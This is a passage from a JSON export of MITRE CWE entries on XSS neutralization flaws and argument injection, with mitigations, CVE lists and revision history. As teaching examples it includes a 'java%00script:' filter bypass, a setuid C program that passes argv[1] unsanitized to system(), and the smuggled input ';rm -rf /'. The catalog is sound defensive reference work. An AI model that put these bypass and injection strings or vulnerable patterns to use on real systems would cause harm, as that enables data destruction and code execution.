different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2086","Description":"XSS using \\"&lt;script\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"},{"Reference":"CVE-2000-0116","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DOUBLE - Doubled character XSS manipulations, e.g. \\"&lt;script\\""},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"245"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"86":{"attr":{"@_ID":"86","@_Name":"Improper Neutralization of Invalid Characters in Identifiers in Web Pages","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.","Extended_Description":"Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the software may attempt to remove a \\"javascript:\\" URI scheme, but a \\"java%00script:\\" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. Multiple Interpretation Error (MIE) and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Invalid Characters in Identifiers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"247"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Invalid Characters in Identifiers","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Invalid Characters in Identifiers in Web Pages","attr":{"@_Date":"2010-04-05"}}]}},"87":{"attr":{"@_ID":"87","@_Name":"Improper Neutralization of Alternate XSS Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0738","Description":"XSS using \\"&amp;={script}\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0738"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate XSS syntax"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"199"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Alternate XSS Syntax","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Alternate XSS Syntax","attr":{"@_Date":"2010-06-21"}}]}},"88":{"attr":{"@_ID":"88","@_Name":"Improper Neutralization of Argument Delimiters in a Command (\'Argument Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs a string for a command to executed by a separate component\\nin another control sphere, but it does not properly delimit the\\nintended arguments, options, or switches within that command string.","Extended_Description":{"xhtml:p":"When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed.  This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters.  When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer.  The attacker may then be able to change the behavior of the command.  Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Read Application Data","Modify Application Data"],"Note":"An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Parameterization","Description":"Where possible, avoid building a single string that contains the command and its arguments.  Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command.  For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments.  In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter.","Effectiveness":"High"},{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0113","Description":"Canonical Example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113"},{"Reference":"CVE-2001-0150","Description":"Web browser executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0150"},{"Reference":"CVE-2001-0667","Description":"Web browser allows remote attackers to execute commands by spawning Telnet with a log file option on the command line and writing arbitrary code into an executable file which is later executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0667"},{"Reference":"CVE-2002-0985","Description":"Argument injection vulnerability in the mail function for PHP may allow attackers to bypass safe mode restrictions and modify command line arguments to the MTA (e.g. sendmail) possibly executing commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0985"},{"Reference":"CVE-2003-0907","Description":"Help and Support center in windows does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an \\"hcp://\\" URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907"},{"Reference":"CVE-2004-0121","Description":"Mail client does not sufficiently filter parameters of mailto: URLs when using them as arguments to mail executable, which allows remote attackers to execute arbitrary programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121"},{"Reference":"CVE-2004-0473","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0473"},{"Reference":"CVE-2004-0480","Description":"Mail client allows remote attackers to execute arbitrary code via a URI that uses a UNC network share pathname to provide an alternate configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480"},{"Reference":"CVE-2004-0489","Description":"SSH URI handler for web browser allows remote attackers to execute arbitrary code or conduct port forwarding via the a command line option.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0489"},{"Reference":"CVE-2004-0411","Description":"Web browser doesn\'t filter \\"-\\" when invoking various commands, allowing command-line switches to be specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411"},{"Reference":"CVE-2005-4699","Description":"Argument injection vulnerability in TellMe 1.2 and earlier allows remote attackers to modify command line arguments for the Whois program and obtain sensitive information via \\"--\\" style options in the q_Host parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4699"},{"Reference":"CVE-2006-1865","Description":"Beagle before 0.2.5 can produce certain insecure command lines to launch external helper applications while indexing, which allows attackers to execute arbitrary commands. NOTE: it is not immediately clear whether this issue involves argument injection, shell metacharacters, or other issues.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1865"},{"Reference":"CVE-2006-2056","Description":"Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2056"},{"Reference":"CVE-2006-2057","Description":"Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2057"},{"Reference":"CVE-2006-2058","Description":"Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via \\" (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2058"},{"Reference":"CVE-2006-2312","Description":"Argument injection vulnerability in the URI handler in Skype 2.0.*.104 and 2.5.*.0 through 2.5.*.78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2312"},{"Reference":"CVE-2006-3015","Description":"Argument injection vulnerability in WinSCP 3.8.1 build 328 allows remote attackers to upload or download arbitrary files via encoded spaces and double-quote characters in a scp or sftp URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3015"},{"Reference":"CVE-2006-4692","Description":"Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a \\"/\\" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka \\"Object Packager Dialogue Spoofing Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4692"},{"Reference":"CVE-2006-6597","Description":"Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6597"},{"Reference":"CVE-2007-0882","Description":"Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client \\"-f\\" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2019-13475","Description":"Argument injection allows execution of arbitrary commands by injecting a \\"-exec\\" option, which is executed by the command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13475"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Argument Injection or Modification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":30,"Entry_Name":"Mail Command Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"137"}},{"attr":{"@_CAPEC_ID":"174"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"460"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-859"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;The Argument Array&#34;, Page 567"}},{"attr":{"@_External_Reference_ID":"REF-1030"}}]},"Notes":{"Note":{"#text":"At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric 